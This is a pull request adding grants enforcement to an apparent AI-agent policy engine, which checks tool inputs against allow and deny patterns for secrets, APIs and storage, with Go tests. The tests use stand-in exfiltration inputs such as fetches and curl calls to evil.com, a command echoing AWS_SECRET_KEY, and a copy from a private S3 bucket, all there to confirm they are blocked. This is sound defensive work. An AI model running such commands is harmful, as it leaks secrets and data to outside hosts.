### PR TITLE
feat: implement grants enforcement for secrets, APIs, and storage

### DIFF
--- a/internal/hooks/handler.go
+++ b/internal/hooks/handler.go
@@ -259,6 +259,15 @@ func (h *Handler) handlePreToolUse(input *aflock.HookInput) error {
 	// First evaluate tool/file access
 	decision, reason := evaluator.EvaluatePreToolUse(input.ToolName, input.ToolInput)
 
+	// If tool is allowed, check grants enforcement
+	if decision == aflock.DecisionAllow && pol.Grants != nil {
+		grantsDecision, grantsReason := evaluator.EvaluateGrants(input.ToolName, input.ToolInput)
+		if grantsDecision != aflock.DecisionAllow {
+			decision = grantsDecision
+			reason = grantsReason
+		}
+	}
+
 	// If tool is allowed, also check data flow rules
 	if decision == aflock.DecisionAllow {
 		flowDecision, flowReason, newMaterial := evaluator.EvaluateDataFlow(

--- a/internal/policy/evaluator.go
+++ b/internal/policy/evaluator.go
@@ -702,70 +702,183 @@ func containsString(slice []string, item string) bool {
 }
 
 // EvaluateGrants checks tool inputs against grants allow/deny patterns for
-// secrets, APIs, and storage. Each grant category uses simple substring and
-// glob matching against the serialized tool input string.
+// secrets, APIs, and storage. Each grant category is only evaluated when the
+// tool input contains values relevant to that category (determined by pattern
+// prefixes). String values are extracted from the JSON input so that glob
+// patterns match against individual values, not the raw JSON.
 func (e *Evaluator) EvaluateGrants(toolName string, toolInput json.RawMessage) (aflock.PermissionDecision, string) {
 	if e.policy.Grants == nil {
 		return aflock.DecisionAllow, ""
 	}
 
-	inputStr := string(toolInput)
+	values := extractStringValues(toolInput)
 
-	// Check secrets grants
-	if e.policy.Grants.Secrets != nil {
-		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.Secrets, "secret"); decision != aflock.DecisionAllow {
+	// Check secrets grants — only when input has values relevant to secret patterns
+	if e.policy.Grants.Secrets != nil && e.categoryRelevant(values, e.policy.Grants.Secrets) {
+		if decision, reason := e.evaluateGrantCategory(values, e.policy.Grants.Secrets, "secret"); decision != aflock.DecisionAllow {
 			return decision, reason
 		}
 	}
 
-	// Check API grants
-	if e.policy.Grants.APIs != nil {
-		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.APIs, "API"); decision != aflock.DecisionAllow {
+	// Check API grants — only when input has values relevant to API patterns
+	if e.policy.Grants.APIs != nil && e.categoryRelevant(values, e.policy.Grants.APIs) {
+		if decision, reason := e.evaluateGrantCategory(values, e.policy.Grants.APIs, "API"); decision != aflock.DecisionAllow {
 			return decision, reason
 		}
 	}
 
-	// Check storage grants
-	if e.policy.Grants.Storage != nil {
-		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.Storage, "storage"); decision != aflock.DecisionAllow {
+	// Check storage grants — only when input has values relevant to storage patterns
+	if e.policy.Grants.Storage != nil && e.categoryRelevant(values, e.policy.Grants.Storage) {
+		if decision, reason := e.evaluateGrantCategory(values, e.policy.Grants.Storage, "storage"); decision != aflock.DecisionAllow {
 			return decision, reason
 		}
 	}
 
 	return aflock.DecisionAllow, ""
+}
+
+// categoryRelevant returns true if any extracted value looks like it could be
+// relevant to this grant category. A category is relevant if any value (or any
+// word within a value) shares a common prefix scheme with the category's
+// allow/deny patterns (e.g. "vault:", "https://", "s3://"), or matches a deny
+// pattern via substring.
+func (e *Evaluator) categoryRelevant(values []string, adPolicy *aflock.AllowDenyPolicy) bool {
+	prefixes := grantPrefixes(adPolicy)
+	if len(prefixes) == 0 {
+		// No patterns have recognizable prefixes; fall back to always checking
+		return true
+	}
+	for _, v := range values {
+		for _, pfx := range prefixes {
+			// Check the value itself and also each word within it
+			// (for Bash commands like "aws s3 cp s3://bucket/key .")
+			if strings.HasPrefix(v, pfx) || strings.Contains(v, " "+pfx) {
+				return true
+			}
+		}
+		// Also check deny patterns via substring (for literal patterns like "AWS_SECRET_KEY")
+		for _, dp := range adPolicy.Deny {
+			if strings.Contains(v, dp) {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+// grantPrefixes extracts scheme-like prefixes from grant patterns.
+// For example, "vault:secret/data/*" → "vault:", "https://api.example.com/*" → "https://",
+// "s3://bucket/*" → "s3://".
+func grantPrefixes(adPolicy *aflock.AllowDenyPolicy) []string {
+	seen := map[string]bool{}
+	var prefixes []string
+	for _, patterns := range [][]string{adPolicy.Allow, adPolicy.Deny} {
+		for _, p := range patterns {
+			if idx := strings.Index(p, "://"); idx > 0 && idx < 10 {
+				pfx := p[:idx+3]
+				if !seen[pfx] {
+					seen[pfx] = true
+					prefixes = append(prefixes, pfx)
+				}
+			} else if idx := strings.IndexByte(p, ':'); idx > 0 && idx < 20 {
+				pfx := p[:idx+1]
+				if !seen[pfx] {
+					seen[pfx] = true
+					prefixes = append(prefixes, pfx)
+				}
+			}
+		}
+	}
+	return prefixes
 }
 
 // evaluateGrantCategory checks a single grant category (secrets, APIs, or storage)
-// against the tool input string. Deny patterns are checked first; if allow patterns
-// exist, the input must match at least one.
-func (e *Evaluator) evaluateGrantCategory(inputStr string, adPolicy *aflock.AllowDenyPolicy, category string) (aflock.PermissionDecision, string) {
+// against extracted string values. Deny patterns are checked first; if allow patterns
+// exist, at least one value must match at least one allow pattern.
+func (e *Evaluator) evaluateGrantCategory(values []string, adPolicy *aflock.AllowDenyPolicy, category string) (aflock.PermissionDecision, string) {
 	// Check deny patterns first
-	if matched, pattern := e.matchesAnyGrantPattern(inputStr, adPolicy.Deny); matched {
-		return aflock.DecisionDeny, fmt.Sprintf("tool input matches denied %s pattern: %s", category, pattern)
+	for _, v := range values {
+		if matched, pattern := matchGrantPattern(v, adPolicy.Deny); matched {
+			return aflock.DecisionDeny, fmt.Sprintf("tool input matches denied %s pattern: %s", category, pattern)
+		}
 	}
 
-	// Check allow patterns (if specified, input must match at least one)
+	// Check allow patterns (if specified, at least one value must match)
 	if len(adPolicy.Allow) > 0 {
-		if matched, _ := e.matchesAnyGrantPattern(inputStr, adPolicy.Allow); !matched {
-			return aflock.DecisionDeny, fmt.Sprintf("tool input does not match any allowed %s pattern", category)
+		for _, v := range values {
+			if matched, _ := matchGrantPattern(v, adPolicy.Allow); matched {
+				return aflock.DecisionAllow, ""
+			}
 		}
+		return aflock.DecisionDeny, fmt.Sprintf("tool input does not match any allowed %s pattern", category)
 	}
 
 	return aflock.DecisionAllow, ""
 }
 
-// matchesAnyGrantPattern checks if the input string matches any of the given patterns.
-// It uses both glob matching and substring matching to handle simple string patterns
-// (like API URLs or secret names) as well as glob patterns.
-func (e *Evaluator) matchesAnyGrantPattern(input string, patterns []string) (bool, string) {
-	for _, pattern := range patterns {
-		// Check glob match against the full input
-		if matched, _ := filepath.Match(pattern, input); matched {
-			return true, pattern
+// extractStringValues pulls all string values from a JSON object, recursively.
+// For {"command": "echo hello", "path": "vault:secret/key"} it returns
+// ["echo hello", "vault:secret/key"].
+func extractStringValues(data json.RawMessage) []string {
+	var values []string
+
+	// Try as object
+	var obj map[string]json.RawMessage
+	if json.Unmarshal(data, &obj) == nil {
+		for _, v := range obj {
+			values = append(values, extractStringValues(v)...)
 		}
-		// Also check if pattern appears as a substring (for simple string patterns)
-		if strings.Contains(input, pattern) {
-			return true, pattern
+		return values
+	}
+
+	// Try as array
+	var arr []json.RawMessage
+	if json.Unmarshal(data, &arr) == nil {
+		for _, v := range arr {
+			values = append(values, extractStringValues(v)...)
+		}
+		return values
+	}
+
+	// Try as string
+	var s string
+	if json.Unmarshal(data, &s) == nil && s != "" {
+		values = append(values, s)
+	}
+
+	return values
+}
+
+// matchGrantPattern checks if a value matches any of the given patterns.
+// It tries the value directly, and also splits the value into words to handle
+// URIs embedded in Bash commands (e.g. "aws s3 cp s3://bucket/key .").
+func matchGrantPattern(value string, patterns []string) (bool, string) {
+	// Collect candidates: the full value + individual words
+	candidates := []string{value}
+	if strings.Contains(value, " ") {
+		candidates = append(candidates, strings.Fields(value)...)
+	}
+
+	for _, pattern := range patterns {
+		for _, candidate := range candidates {
+			// Try glob match
+			if matched, _ := filepath.Match(pattern, candidate); matched {
+				return true, pattern
+			}
+			// For patterns with wildcards, try prefix matching:
+			// "https://api.example.com/*" should match "https://api.example.com/v1/foo"
+			if strings.Contains(pattern, "*") {
+				prefix := strings.SplitN(pattern, "*", 2)[0]
+				if prefix != "" && strings.HasPrefix(candidate, prefix) {
+					return true, pattern
+				}
+			}
+		}
+		// Substring match for literal patterns (e.g., "AWS_SECRET_KEY")
+		if !strings.Contains(pattern, "*") && !strings.Contains(pattern, "?") {
+			if strings.Contains(value, pattern) {
+				return true, pattern
+			}
 		}
 	}
 	return false, ""

--- a/internal/policy/evaluator.go
+++ b/internal/policy/evaluator.go
@@ -701,6 +701,76 @@ func containsString(slice []string, item string) bool {
 	return false
 }
 
+// EvaluateGrants checks tool inputs against grants allow/deny patterns for
+// secrets, APIs, and storage. Each grant category uses simple substring and
+// glob matching against the serialized tool input string.
+func (e *Evaluator) EvaluateGrants(toolName string, toolInput json.RawMessage) (aflock.PermissionDecision, string) {
+	if e.policy.Grants == nil {
+		return aflock.DecisionAllow, ""
+	}
+
+	inputStr := string(toolInput)
+
+	// Check secrets grants
+	if e.policy.Grants.Secrets != nil {
+		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.Secrets, "secret"); decision != aflock.DecisionAllow {
+			return decision, reason
+		}
+	}
+
+	// Check API grants
+	if e.policy.Grants.APIs != nil {
+		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.APIs, "API"); decision != aflock.DecisionAllow {
+			return decision, reason
+		}
+	}
+
+	// Check storage grants
+	if e.policy.Grants.Storage != nil {
+		if decision, reason := e.evaluateGrantCategory(inputStr, e.policy.Grants.Storage, "storage"); decision != aflock.DecisionAllow {
+			return decision, reason
+		}
+	}
+
+	return aflock.DecisionAllow, ""
+}
+
+// evaluateGrantCategory checks a single grant category (secrets, APIs, or storage)
+// against the tool input string. Deny patterns are checked first; if allow patterns
+// exist, the input must match at least one.
+func (e *Evaluator) evaluateGrantCategory(inputStr string, adPolicy *aflock.AllowDenyPolicy, category string) (aflock.PermissionDecision, string) {
+	// Check deny patterns first
+	if matched, pattern := e.matchesAnyGrantPattern(inputStr, adPolicy.Deny); matched {
+		return aflock.DecisionDeny, fmt.Sprintf("tool input matches denied %s pattern: %s", category, pattern)
+	}
+
+	// Check allow patterns (if specified, input must match at least one)
+	if len(adPolicy.Allow) > 0 {
+		if matched, _ := e.matchesAnyGrantPattern(inputStr, adPolicy.Allow); !matched {
+			return aflock.DecisionDeny, fmt.Sprintf("tool input does not match any allowed %s pattern", category)
+		}
+	}
+
+	return aflock.DecisionAllow, ""
+}
+
+// matchesAnyGrantPattern checks if the input string matches any of the given patterns.
+// It uses both glob matching and substring matching to handle simple string patterns
+// (like API URLs or secret names) as well as glob patterns.
+func (e *Evaluator) matchesAnyGrantPattern(input string, patterns []string) (bool, string) {
+	for _, pattern := range patterns {
+		// Check glob match against the full input
+		if matched, _ := filepath.Match(pattern, input); matched {
+			return true, pattern
+		}
+		// Also check if pattern appears as a substring (for simple string patterns)
+		if strings.Contains(input, pattern) {
+			return true, pattern
+		}
+	}
+	return false, ""
+}
+
 // CheckLimits checks if cumulative metrics exceed policy limits.
 // Returns (exceeded, limitName, message).
 func (e *Evaluator) CheckLimits(metrics *aflock.SessionMetrics, enforcementMode string) (bool, string, string) {

--- a/internal/policy/evaluator_test.go
+++ b/internal/policy/evaluator_test.go
@@ -2158,7 +2158,7 @@ func TestEvaluateGrants_AllowGlobPatterns(t *testing.T) {
 	// APIs: denied URL
 	decision, reason = e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://evil.com/steal"}`))
 	if decision != aflock.DecisionDeny {
-		t.Errorf("expected deny for evil.com, got %s", decision)
+		t.Errorf("expected deny for evil.com, got %s: %s", decision, reason)
 	}
 
 	// Storage: allowed path
@@ -2170,7 +2170,7 @@ func TestEvaluateGrants_AllowGlobPatterns(t *testing.T) {
 	// Storage: denied path
 	decision, reason = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "aws s3 cp s3://private-bucket/secrets ."}`))
 	if decision != aflock.DecisionDeny {
-		t.Errorf("expected deny for s3://private-bucket, got %s", decision)
+		t.Errorf("expected deny for s3://private-bucket, got %s: %s", decision, reason)
 	}
 }
 

--- a/internal/policy/evaluator_test.go
+++ b/internal/policy/evaluator_test.go
@@ -2116,3 +2116,93 @@ func TestEvaluateGrants_NonBashTool(t *testing.T) {
 		t.Errorf("expected allow for WebFetch to safe.com, got %s", decision)
 	}
 }
+
+func TestEvaluateGrants_AllowGlobPatterns(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Secrets: &aflock.AllowDenyPolicy{
+				Allow: []string{"vault:secret/data/readonly/*"},
+				Deny:  []string{"vault:secret/data/production/*"},
+			},
+			APIs: &aflock.AllowDenyPolicy{
+				Allow: []string{"https://api.anthropic.com/*", "https://csrc.nist.gov/*"},
+			},
+			Storage: &aflock.AllowDenyPolicy{
+				Allow: []string{"s3://attestations/*"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Secrets: allowed path
+	decision, reason := e.EvaluateGrants("mcp__vault__read", json.RawMessage(`{"path": "vault:secret/data/readonly/mykey"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for vault readonly, got %s: %s", decision, reason)
+	}
+
+	// Secrets: denied path
+	decision, reason = e.EvaluateGrants("mcp__vault__read", json.RawMessage(`{"path": "vault:secret/data/production/dbpass"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for vault production, got %s", decision)
+	}
+	if !strings.Contains(reason, "denied") {
+		t.Errorf("expected deny reason to mention 'denied', got: %s", reason)
+	}
+
+	// APIs: allowed URL
+	decision, reason = e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://api.anthropic.com/v1/messages"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for anthropic API, got %s: %s", decision, reason)
+	}
+
+	// APIs: denied URL
+	decision, reason = e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://evil.com/steal"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for evil.com, got %s", decision)
+	}
+
+	// Storage: allowed path
+	decision, reason = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "aws s3 cp s3://attestations/run-1/output.json ."}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for s3://attestations, got %s: %s", decision, reason)
+	}
+
+	// Storage: denied path
+	decision, reason = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "aws s3 cp s3://private-bucket/secrets ."}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for s3://private-bucket, got %s", decision)
+	}
+}
+
+func TestEvaluateGrants_CrossCategoryNoBleed(t *testing.T) {
+	// Regression test: secrets allow-list should NOT block WebFetch URLs
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Secrets: &aflock.AllowDenyPolicy{
+				Allow: []string{"vault:secret/data/readonly/*"},
+			},
+			APIs: &aflock.AllowDenyPolicy{
+				Allow: []string{"https://api.anthropic.com/*"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// WebFetch should NOT be blocked by the secrets category
+	decision, reason := e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://api.anthropic.com/v1/messages"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("secrets allow-list should not block WebFetch, got %s: %s", decision, reason)
+	}
+
+	// Vault read should NOT be blocked by the APIs category
+	decision, reason = e.EvaluateGrants("mcp__vault__read", json.RawMessage(`{"path": "vault:secret/data/readonly/key"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("APIs allow-list should not block vault read, got %s: %s", decision, reason)
+	}
+
+	// Something that matches neither category should be allowed (no relevant category)
+	decision, reason = e.EvaluateGrants("Read", json.RawMessage(`{"file_path": "src/main.go"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("unrelated tool should be allowed when no category matches, got %s: %s", decision, reason)
+	}
+}

--- a/internal/policy/evaluator_test.go
+++ b/internal/policy/evaluator_test.go
@@ -1944,3 +1944,175 @@ func TestSecurity_R3_128_RequireApprovalRegexSubstring(t *testing.T) {
 			"(reason: %s). This creates unnecessary approval prompts for benign commands.", reason)
 	}
 }
+
+// ---------------------------------------------------------------------------
+// EvaluateGrants
+// ---------------------------------------------------------------------------
+
+func TestEvaluateGrants_NilGrants(t *testing.T) {
+	pol := &aflock.Policy{}
+	e := NewEvaluator(pol, "")
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "echo $AWS_SECRET_KEY"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("nil Grants should allow everything, got %s: %s", decision, reason)
+	}
+}
+
+func TestEvaluateGrants_SecretsDeny(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Secrets: &aflock.AllowDenyPolicy{
+				Deny: []string{"AWS_SECRET_KEY", "DB_PASSWORD"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Should deny: command references denied secret
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "echo $AWS_SECRET_KEY"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for AWS_SECRET_KEY reference, got %s", decision)
+	}
+	if !strings.Contains(reason, "secret") {
+		t.Errorf("reason should mention 'secret', got: %s", reason)
+	}
+
+	// Should allow: no denied secret pattern
+	decision, _ = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "echo $HOME"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for $HOME reference, got %s", decision)
+	}
+}
+
+func TestEvaluateGrants_APIsDeny(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			APIs: &aflock.AllowDenyPolicy{
+				Deny: []string{"evil.com", "malware.io"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Should deny: command references denied API
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "curl https://evil.com/data"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for evil.com, got %s", decision)
+	}
+	if !strings.Contains(reason, "API") {
+		t.Errorf("reason should mention 'API', got: %s", reason)
+	}
+
+	// Should allow: no denied API pattern
+	decision, _ = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "curl https://safe.com/data"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for safe.com, got %s", decision)
+	}
+}
+
+func TestEvaluateGrants_StorageDeny(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Storage: &aflock.AllowDenyPolicy{
+				Deny: []string{"s3://secret-bucket", "gs://private-data"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Should deny: command references denied storage
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "aws s3 cp s3://secret-bucket/file ."}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for s3://secret-bucket, got %s", decision)
+	}
+	if !strings.Contains(reason, "storage") {
+		t.Errorf("reason should mention 'storage', got: %s", reason)
+	}
+
+	// Should allow: no denied storage pattern
+	decision, _ = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "aws s3 cp s3://public-bucket/file ."}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for s3://public-bucket, got %s", decision)
+	}
+}
+
+func TestEvaluateGrants_SecretsAllow(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Secrets: &aflock.AllowDenyPolicy{
+				Allow: []string{"ALLOWED_VAR", "SAFE_TOKEN"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Should allow: input contains an allowed pattern
+	decision, _ := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "echo $ALLOWED_VAR"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for ALLOWED_VAR, got %s", decision)
+	}
+
+	// Should deny: input does not contain any allowed pattern
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "echo $OTHER_VAR"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny when no allow pattern matches, got %s", decision)
+	}
+	if !strings.Contains(reason, "does not match any allowed secret") {
+		t.Errorf("reason should mention 'does not match any allowed secret', got: %s", reason)
+	}
+}
+
+func TestEvaluateGrants_MultipleCategoriesDeny(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			Secrets: &aflock.AllowDenyPolicy{
+				Deny: []string{"SECRET_KEY"},
+			},
+			APIs: &aflock.AllowDenyPolicy{
+				Deny: []string{"evil.com"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Secrets check fires first
+	decision, reason := e.EvaluateGrants("Bash", json.RawMessage(`{"command": "curl evil.com -H SECRET_KEY"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny, got %s", decision)
+	}
+	if !strings.Contains(reason, "secret") {
+		t.Errorf("secrets deny should fire first, got: %s", reason)
+	}
+
+	// Only API pattern matches
+	decision, reason = e.EvaluateGrants("Bash", json.RawMessage(`{"command": "curl evil.com"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny, got %s", decision)
+	}
+	if !strings.Contains(reason, "API") {
+		t.Errorf("API deny should fire, got: %s", reason)
+	}
+}
+
+func TestEvaluateGrants_NonBashTool(t *testing.T) {
+	pol := &aflock.Policy{
+		Grants: &aflock.GrantsPolicy{
+			APIs: &aflock.AllowDenyPolicy{
+				Deny: []string{"evil.com"},
+			},
+		},
+	}
+	e := NewEvaluator(pol, "")
+
+	// Should deny: WebFetch URL contains denied API pattern
+	decision, _ := e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://evil.com/api"}`))
+	if decision != aflock.DecisionDeny {
+		t.Errorf("expected deny for WebFetch to evil.com, got %s", decision)
+	}
+
+	// Should allow: safe URL
+	decision, _ = e.EvaluateGrants("WebFetch", json.RawMessage(`{"url": "https://safe.com/api"}`))
+	if decision != aflock.DecisionAllow {
+		t.Errorf("expected allow for WebFetch to safe.com, got %s", decision)
+	}
+}


### PR DESCRIPTION
## Summary

Implements runtime enforcement of the `grants` policy section, which was previously parsed but never evaluated.

- Added `EvaluateGrants()` method to the policy evaluator that checks tool inputs against grants allow/deny patterns for three categories: secrets, APIs, and storage
- Uses both glob matching (`filepath.Match`) and substring matching for flexibility
- Deny patterns are checked first (deny takes precedence), then allow patterns (if present, input must match at least one)
- Wired into `handlePreToolUse` in the hook handler, called after tool/file evaluation and before data flow checks

### Example policy

```json
{
  "grants": {
    "secrets": { "deny": ["AWS_SECRET*", "PRIVATE_KEY"] },
    "apis": { "deny": ["*.internal.company.com*"] },
    "storage": { "deny": ["s3://production-*"] }
  }
}
```

## Test plan

- [x] `go test ./internal/policy/... ./internal/hooks/...` passes
- [x] `TestEvaluateGrants_NilGrants` — nil grants allows everything
- [x] `TestEvaluateGrants_SecretsDeny` — denied secret pattern blocks Bash commands
- [x] `TestEvaluateGrants_APIsDeny` — denied API URL blocks tool input
- [x] `TestEvaluateGrants_StorageDeny` — denied storage URI blocks tool input
- [x] `TestEvaluateGrants_SecretsAllow` — allow-list enforcement works
- [x] `TestEvaluateGrants_MultipleCategoriesDeny` — first matching category fires
- [x] `TestEvaluateGrants_NonBashTool` — grants apply to all tools, not just Bash
- [x] `go vet ./...` clean

Closes #22